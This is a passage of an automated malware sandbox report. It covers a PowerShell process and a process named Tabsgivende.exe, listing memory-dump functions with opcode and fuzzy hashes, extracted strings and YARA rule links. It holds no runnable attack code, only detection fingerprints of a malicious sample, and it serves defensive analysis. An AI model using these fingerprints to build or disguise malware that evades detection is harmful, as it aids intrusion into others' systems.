Opcode ID: d0a9b0ed8227c80844c94ec6ebef7bb5ad248f9b245d02c0eada010697dd7a56
Instruction ID: efa639c7e351ec5561986f7ade7ba5deee4cd2dd2df7563cd4f2b46cf253220f
Opcode Fuzzy Hash: d0a9b0ed8227c80844c94ec6ebef7bb5ad248f9b245d02c0eada010697dd7a56
Instruction Fuzzy Hash: BB213632B00250AFDB5A8E08C591A76BFA2DF81210F18C066E809CF392CFB6DD91C775

Function 06FE1318 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d6bad956a4239f0ea4deb3d99b9ea1333668eef647faf61530ca390b99a924b
Instruction ID: 1f3bb8742928d573fcf2c7ec82e3aafcbbcd6783915763bd233c5c64b4972583
Opcode Fuzzy Hash: 8d6bad956a4239f0ea4deb3d99b9ea1333668eef647faf61530ca390b99a924b
Instruction Fuzzy Hash: E9014737B003158FD764C6AB940227ABB99DBC5322F14C07FE899C6A50D632C845C3A0

Function 0447B204 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2188123452.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01569e18688e57e3a631ef6597dc5398b65917222de598df6526ac4b084d11af
Instruction ID: 97dd7f520b2e718893e6c8340c7424f8790b02eed1153c7a2013c53d71e243da
Opcode Fuzzy Hash: 01569e18688e57e3a631ef6597dc5398b65917222de598df6526ac4b084d11af
Instruction Fuzzy Hash: 7F11C374A01249EFDF15CBA8D884A9DBBB2FF48314F288559E404AB365C775B882CB80

Function 026ED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2185202703.00000000026ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 026ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b72f5e736a27a4db852197f134f8bec77c3cd3a2e550df1beca0c2aa4099cf58
Instruction ID: 01706c6f8fc05968a1a5cd74349d1c25fcd4cceeac5c3f7ac454806a551a8554
Opcode Fuzzy Hash: b72f5e736a27a4db852197f134f8bec77c3cd3a2e550df1beca0c2aa4099cf58
Instruction Fuzzy Hash: F3012B314063809EEB205E11CDC4B67BF9CDF41225F0CC419EC5A0F282C7799846CAB6

Function 026ED01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2185202703.00000000026ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 026ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea8a00bef1fc33e64aeb3552141ccd7d54582dbae5c886cff37c038361060ab
Instruction ID: b2d02f0a2889aec6a5a155a112d209a32fba2952c1daf21f5b2d95c8264d6a6c
Opcode Fuzzy Hash: aea8a00bef1fc33e64aeb3552141ccd7d54582dbae5c886cff37c038361060ab
Instruction Fuzzy Hash: A6F0C271005380AEEB108E15C984B62FF9CEB41234F18C55AED594A286C3799841CAB1

Function 06FE1FC7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05927a8f7f2ac978983a0f2f7d4b0de34ff3d656d70e0200778e6aaf2a71cf87
Instruction ID: 2e98b3f764bbdaae1711f9ef97c2bfa1f3d2cf2872f0bff9b5ee3c63d30620ac
Opcode Fuzzy Hash: 05927a8f7f2ac978983a0f2f7d4b0de34ff3d656d70e0200778e6aaf2a71cf87
Instruction Fuzzy Hash: 7DB012701061404FC205CB70C851400BB219FC6104328C0CFE4448B293CF23EE07C700

Non-executed Functions

Function 0447ECC8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vzk, xrefs: 0447EF13

Memory Dump Source

Source File: 00000002.00000002.2188123452.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4470000_powershell.jbxd

Similarity

API ID:
String ID: \Vzk
API String ID: 0-3340637352
Opcode ID: 66774e14d03a7ac97d2c342c32ae18120e3cb7e95a23dbc59653869d20f31710
Instruction ID: d09b0a01bdd92f7445841101e694897a0a976d3ee4a588d1620143b0e2532b3d
Opcode Fuzzy Hash: 66774e14d03a7ac97d2c342c32ae18120e3cb7e95a23dbc59653869d20f31710
Instruction Fuzzy Hash: 93912170E002099FDF24CFA9D9857DEBBF2EF48314F24866AE415A7394DB74A846CB41

Function 026ED244 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2185202703.00000000026ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 026ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bf18112bcf1af03f2268e9f52f7d52f75387844397260de4752b9c923a0d7c
Instruction ID: 580d58aaaf80eddb665722cfe19e564ea5cb4ad5e573d5777296a38d6beec622
Opcode Fuzzy Hash: c2bf18112bcf1af03f2268e9f52f7d52f75387844397260de4752b9c923a0d7c
Instruction Fuzzy Hash: 60210672505240EFDF15DF10D9C0B1ABBA9FB88314F248669EA4A0F346C336D456CBA2

Function 06FEAC05 Relevance: 19.0, Strings: 15, Instructions: 285COMMON

Download Yara Rule

Strings

(q, xrefs: 06FEADF2
4'q, xrefs: 06FEAF04
(q, xrefs: 06FEAE56
$q, xrefs: 06FEAC5D
tPq, xrefs: 06FEAE2C
84l, xrefs: 06FEADDA
(q, xrefs: 06FEAE60
(q, xrefs: 06FEAE95
tPq, xrefs: 06FEAD31
4'q, xrefs: 06FEAF10
84l, xrefs: 06FEADE4
84l, xrefs: 06FEACDE
84l, xrefs: 06FEACE8
tPq, xrefs: 06FEAE38
tPq, xrefs: 06FEAD3D

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$84l$84l$84l$84l$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
API String ID: 0-3479167584
Opcode ID: 3877dd5e3e709984259eb490720d1e4df2649a0c089b95bdb2e83e8a9e7a3740
Instruction ID: eea01808b2b515006bbf915f9f7ecf1ac5baadd9a220f483dcaaa3274cedebd8
Opcode Fuzzy Hash: 3877dd5e3e709984259eb490720d1e4df2649a0c089b95bdb2e83e8a9e7a3740
Instruction Fuzzy Hash: 06A1B135F002159FEB659F69C80576ABFE2AF88711F28846AEC05AF390DB35DC41C7A1

Function 06FED1C8 Relevance: 10.3, Strings: 8, Instructions: 299COMMON

Download Yara Rule

Strings

84l, xrefs: 06FED265
84l, xrefs: 06FED36B
tPq, xrefs: 06FED2B7
84l, xrefs: 06FED377
tPq, xrefs: 06FED3D4
tPq, xrefs: 06FED2C3
tPq, xrefs: 06FED3C8
84l, xrefs: 06FED26F

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 84l$84l$84l$84l$tPq$tPq$tPq$tPq
API String ID: 0-3028639168
Opcode ID: 3190bc1248c73148d3456bf2c483085e0445ef59ffccf1df3066766d1d4643bc
Instruction ID: a638828520ee8b194f745493659a3ba328f12b92c38bc3d374616cbdfa7324a3
Opcode Fuzzy Hash: 3190bc1248c73148d3456bf2c483085e0445ef59ffccf1df3066766d1d4643bc
Instruction Fuzzy Hash: B0B1C331F002549FDB64DB59C811B6ABFE2BF89310F24846AE9469F791DA71EC01CBE1

Function 06FEB6B5 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

XRq, xrefs: 06FEB6F1
XRq, xrefs: 06FEB835
84l, xrefs: 06FEB749
$q, xrefs: 06FEB70D
84l, xrefs: 06FEB73F
XRq, xrefs: 06FEB825
tPq, xrefs: 06FEB794
tPq, xrefs: 06FEB7A0

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 84l$84l$XRq$XRq$XRq$tPq$tPq$$q
API String ID: 0-3926158223
Opcode ID: 076bb54d52fe6654d6da459876e4199bde6b883cb0dd19150837463aa5b66ad4
Instruction ID: 6d731ddd7be053be0bfc2700bc118721c1be8e9f34966455b8eac5e5e56e8d4d
Opcode Fuzzy Hash: 076bb54d52fe6654d6da459876e4199bde6b883cb0dd19150837463aa5b66ad4
Instruction Fuzzy Hash: 7161F431F042059FEB649F6485517AABFB2AF89311F24C06AE8059F751DB31DD42CBA1

Function 06FE3020 Relevance: 7.8, Strings: 6, Instructions: 293COMMON

Download Yara Rule

Strings

4'q, xrefs: 06FE33B9
tPq, xrefs: 06FE3152
84l, xrefs: 06FE3105
84l, xrefs: 06FE30FB
4'q, xrefs: 06FE33C5
tPq, xrefs: 06FE315E

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$84l$84l$tPq$tPq
API String ID: 0-3098761324
Opcode ID: 5222b94863831ee3f5cb2b6548d4b45b7af7d62f81e265c0dd5e3c459b980da8
Instruction ID: dc957252001db53aa4299975bc27ccc2fb818546642705f80778d9dc412532c6
Opcode Fuzzy Hash: 5222b94863831ee3f5cb2b6548d4b45b7af7d62f81e265c0dd5e3c459b980da8
Instruction Fuzzy Hash: 24A12532F002159FDB559B69D8557BABFE2AFC5210F28846ED9468B391DB32DC01C3A1

Function 06FE7658 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$q, xrefs: 06FE76AB
$q, xrefs: 06FE768F
$q, xrefs: 06FE76DF
$q, xrefs: 06FE76D3
$q, xrefs: 06FE76FB
$q, xrefs: 06FE76EF

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: a91e639154f76de79943d2c0d2afb655a47478a1f3739b99c3483e73e63d1e61
Instruction ID: 30f6c9d4e5555d61581cec41445de506fc8103825f96be2170f64601b21f0c65
Opcode Fuzzy Hash: a91e639154f76de79943d2c0d2afb655a47478a1f3739b99c3483e73e63d1e61
Instruction Fuzzy Hash: 8B315A36F043478FEB796A69A811177FFA2EBC2215728847FD842CB241DE31D415C791

Function 06FEB045 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

tPq, xrefs: 06FEB12E
84l, xrefs: 06FEB0CF
84l, xrefs: 06FEB0D9
$q, xrefs: 06FEB09D
tPq, xrefs: 06FEB122

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 84l$84l$tPq$tPq$$q
API String ID: 0-730519276
Opcode ID: 7e1644c082f61d1612c57abcb0bd4f7ceef292acbb7ef9f05136c0d598bb62e5
Instruction ID: bf48895578a985669a0733057eaf09775277eee339df032ec176daecd8bdbc1f
Opcode Fuzzy Hash: 7e1644c082f61d1612c57abcb0bd4f7ceef292acbb7ef9f05136c0d598bb62e5
Instruction Fuzzy Hash: 8A611431F002059FEB649FA48601B6ABFE2AF89311F28C469E9159F251CB35EC41CBA1

Function 06FE0470 Relevance: 6.4, Strings: 5, Instructions: 145COMMON

Download Yara Rule

Strings

$q, xrefs: 06FE0541
$q, xrefs: 06FE04FC
4'q, xrefs: 06FE055E
$q, xrefs: 06FE0535
4'q, xrefs: 06FE056A

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: dabd2bf63f2eee9ce3f2a78daf49f1be7575ce7356d00cc697b2ad27a9b5d361
Instruction ID: 559cc111989d608566acc1b3b52876eac1b73cd84ef3978057c3931acc3c6269
Opcode Fuzzy Hash: dabd2bf63f2eee9ce3f2a78daf49f1be7575ce7356d00cc697b2ad27a9b5d361
Instruction Fuzzy Hash: E2413531F003059FDB659F3898103AE7FA2AFC6210F14846BD906CB291DF75DA51C7A6

Function 06FE2780 Relevance: 6.4, Strings: 5, Instructions: 130COMMON

Download Yara Rule

Strings

$q, xrefs: 06FE2810
4'q, xrefs: 06FE287A
4'q, xrefs: 06FE286E
$q, xrefs: 06FE27B7
$q, xrefs: 06FE281C

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 21b9cfbb6d8c5c9fd5f6f7c1ffd6eeb2a5b9084d56097acdeb987ff3f106f6fb
Instruction ID: 9825ad3cbf4b4b71139ebb13eb05b67bdc4ee02be953450ebef22da5cdbdcfee
Opcode Fuzzy Hash: 21b9cfbb6d8c5c9fd5f6f7c1ffd6eeb2a5b9084d56097acdeb987ff3f106f6fb
Instruction Fuzzy Hash: ED416E32F08206DFDB694B699801166BFE9FF85211728816BDC118B291FB35CB45C761

Function 06FE0778 Relevance: 6.4, Strings: 5, Instructions: 106COMMON

Download Yara Rule

Strings

4'q, xrefs: 06FE0818
$q, xrefs: 06FE07F3
4'q, xrefs: 06FE080C
$q, xrefs: 06FE07E7
$q, xrefs: 06FE07CB

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 9e893523c2487e513ac6ecfacacb4807e5b957635b255903c19542dc1ab2f347
Instruction ID: 698d852ae0a189437ad2dbb9491af8a55ed63bd955903d60f71ae229a38f9f20
Opcode Fuzzy Hash: 9e893523c2487e513ac6ecfacacb4807e5b957635b255903c19542dc1ab2f347
Instruction Fuzzy Hash: 7A31B631F04206CFD7649B6994012ABBFB2AF85211F28847BD845D7251EF71CA62CBD1

Function 06FE9D78 Relevance: 5.5, Strings: 4, Instructions: 479COMMON

Download Yara Rule

Strings

(oq, xrefs: 06FEA1B1
(oq, xrefs: 06FEA1A1
(oq, xrefs: 06FE9E6E
(oq, xrefs: 06FE9E5E

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq
API String ID: 0-3853041632
Opcode ID: f34b909fa9b19fc8ce24cb8e7361bf21b9e377f77c7bf5b73e4e222322281e17
Instruction ID: ced4b1f65c6948af02281342c7f6c36da95838af6025ecb314202a72bbdf4a61
Opcode Fuzzy Hash: f34b909fa9b19fc8ce24cb8e7361bf21b9e377f77c7bf5b73e4e222322281e17
Instruction Fuzzy Hash: 4FF15831F04345DFEB648F65C8117AABFB2FF85310F14846AE9568B291CB76D841CBA1

Function 06FE7FFE Relevance: 5.4, Strings: 4, Instructions: 355COMMON

Download Yara Rule

Strings

4'q, xrefs: 06FE8374
4'q, xrefs: 06FE8368
4'q, xrefs: 06FE82E5
4'q, xrefs: 06FE82F1

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q
API String ID: 0-4210068417
Opcode ID: 38666ead81ae182cad6073aef376d6cc8d3083e89dd807c2e629457115d62a38
Instruction ID: 72fc3cc45557d639008ea4da4d049b9026f76c71059004f32b3b1ef824d62a4a
Opcode Fuzzy Hash: 38666ead81ae182cad6073aef376d6cc8d3083e89dd807c2e629457115d62a38
Instruction Fuzzy Hash: 9EF15E74E01224CFDB64DB54C865B9ABBB2BB89344F50C0A9D5096F381CB72ED82CF91

Function 06FE54B0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(fl, xrefs: 06FE55A7
(fl, xrefs: 06FE5625
(fl, xrefs: 06FE562F
(fl, xrefs: 06FE55B1

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl$(fl$(fl
API String ID: 0-2123353879
Opcode ID: 1a8524bc7343e6c61c4f6a3d1a50125617d7e1a8cfd860a580c62ac747722830
Instruction ID: 8e3a07b987d1a22c8221423db4941ed72f4dce0884826c0fc6b5ec066916bb05
Opcode Fuzzy Hash: 1a8524bc7343e6c61c4f6a3d1a50125617d7e1a8cfd860a580c62ac747722830
Instruction Fuzzy Hash: B1715C74E00214DFDB64DF58C551AAABBB2BF8A318F24C169D805AF355CB32EC41CBA1

Function 06FED1C1 Relevance: 5.2, Strings: 4, Instructions: 174COMMON

Download Yara Rule

Strings

84l, xrefs: 06FED265
84l, xrefs: 06FED36B
tPq, xrefs: 06FED2B7
tPq, xrefs: 06FED3C8

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 84l$84l$tPq$tPq
API String ID: 0-682670439
Opcode ID: b5a31eec50b2e3a3f982811ac983c488c0d9fabfff31307b0483012a485f5f28
Instruction ID: d8b8d5d144c35f393356746000e8d7460df8e06c82f2fee64c5856f25485c8c4
Opcode Fuzzy Hash: b5a31eec50b2e3a3f982811ac983c488c0d9fabfff31307b0483012a485f5f28
Instruction Fuzzy Hash: 34518D35E002149FDB64CF59C441B69FBE2BF99310F19C46AE81AAB790C771EC41CB91

Function 06FEFEB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 06FEFEE6
$q, xrefs: 06FEFF14
$q, xrefs: 06FEFECA
$q, xrefs: 06FEFF20

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 196941c97863810f4bba71417fab4e9c077a63751873f8888aa1ec80c40ebe93
Instruction ID: eaf3f796c6d30af99338c933c50e9b1f75e58b2ca02c597ef5cbaa2e99a8d527
Opcode Fuzzy Hash: 196941c97863810f4bba71417fab4e9c077a63751873f8888aa1ec80c40ebe93
Instruction Fuzzy Hash: 69213B32F113515FEBB4567A9811727BFD69BC1621F24853AE945CB3C2DE3AD841C360

Function 06FE0323 Relevance: 5.0, Strings: 4, Instructions: 35COMMON

Download Yara Rule

Strings

4'q, xrefs: 06FE037F
$q, xrefs: 06FE0352
4'q, xrefs: 06FE0373
$q, xrefs: 06FE035E

Memory Dump Source

Source File: 00000002.00000002.2195134649.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: d38fd0c509420bf4d81ca0bbe4348965a4799da6dc21a52aff488df27278db40
Instruction ID: b0eb99c7488c59579c66e91c06198dde5d3e4ecc59edf24de84bac58eec897db
Opcode Fuzzy Hash: d38fd0c509420bf4d81ca0bbe4348965a4799da6dc21a52aff488df27278db40
Instruction Fuzzy Hash: A9F02721F005178FE6785168342263A5DA35BC066073D812AE803DF344CDA58C62879A

Analysis Process: Tabsgivende.exePID: 2020, Parent PID: 4324COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 22562C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22562C7A

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5dce66a4e0a11365b031b31f637a15c84a3ac6329dc22ce50a8a590ecc42b5b0
Instruction ID: 72e9690ff3fad708fabef4383b2f57023863b397b8f5888f0cfc5f9373c81a92
Opcode Fuzzy Hash: 5dce66a4e0a11365b031b31f637a15c84a3ac6329dc22ce50a8a590ecc42b5b0
Instruction Fuzzy Hash: E990023124158802D1107158844879A005547D0311F9DC421A4424618DC69989917121

Function 22562DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22562DFA

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9644a76ee4f543454e037e289427860ecfbd6248b3f87f0baaee1756e462bd1b
Instruction ID: 6495345dbe368004634599fd7bee5ce0bc1243d18387c556ecacc56b763452b0
Opcode Fuzzy Hash: 9644a76ee4f543454e037e289427860ecfbd6248b3f87f0baaee1756e462bd1b
Instruction Fuzzy Hash: 3190023124150413D11171584548757005947D0251FD9C422A0424518DD65A8A52B121

Function 225635C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 225635CA

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25dfbc5f993e97ec3948ccf36b835d8d01ba743d8617dd350a342649d285a9ef
Instruction ID: 10ae87fc51e68eb1e2a1eb79b34b7227cb3467b0a20ea83ab5a18047437eeb31
Opcode Fuzzy Hash: 25dfbc5f993e97ec3948ccf36b835d8d01ba743d8617dd350a342649d285a9ef
Instruction Fuzzy Hash: 0090023164560402D10071584558756105547D0211FA9C421A0424528DC7998A5175A2

Function 22562C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22562C24

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efa38ad891326ed8a59d0673f224eddcf779b838213d1adb694beade28495b84
Instruction ID: 9234edc2a2f8b291af297cd6e56814aff1bf0ae583c0d5f3a355616138437844
Opcode Fuzzy Hash: efa38ad891326ed8a59d0673f224eddcf779b838213d1adb694beade28495b84
Instruction Fuzzy Hash: 9BB09272942AC5DAEA01E7604B0CB2B7E516BD0711F6AC072E2034642F877CC2D1F2B6

Non-executed Functions

Function 225A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

CFGOptions, xrefs: 225A2967
RaiseExceptionOnPossibleDeadlock, xrefs: 225A2579
Initializing the application verifier package failed with status 0x%08lx, xrefs: 225A3176
MinimumStackCommitInBytes, xrefs: 225A2BB0
UseImpersonatedDeviceMap, xrefs: 225A251C
MaxLoaderThreads, xrefs: 225A24EC
TracingFlags, xrefs: 225A2549
@, xrefs: 225A2942
MaxDeadActivationContexts, xrefs: 225A2D82
minkernel\ntdll\ldrinit.c, xrefs: 225A3187
@, xrefs: 225A2B74
GlobalFlag2, xrefs: 225A2FC0
LdrpInitializeExecutionOptions, xrefs: 225A317D
ExecuteOptions, xrefs: 225A25A0
ShutdownFlags, xrefs: 225A24A1
UnloadEventTraceDepth, xrefs: 225A24C0
DisableExceptionChainValidation, xrefs: 225A275F
FrontEndHeapDebugOptions, xrefs: 225A2489
GlobalFlag, xrefs: 225A2F3F, 225A3059
DisableHeapLookaside, xrefs: 225A246D

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: b25afba9fd1ad3cd5e6f67c26685effa7e1944a3644dec6b60a64149571ecb4e
Instruction ID: d9eb9e45aaf04daac376d794d8e1d1a5b90bfb9406808920d72dd6e7157264f7
Opcode Fuzzy Hash: b25afba9fd1ad3cd5e6f67c26685effa7e1944a3644dec6b60a64149571ecb4e
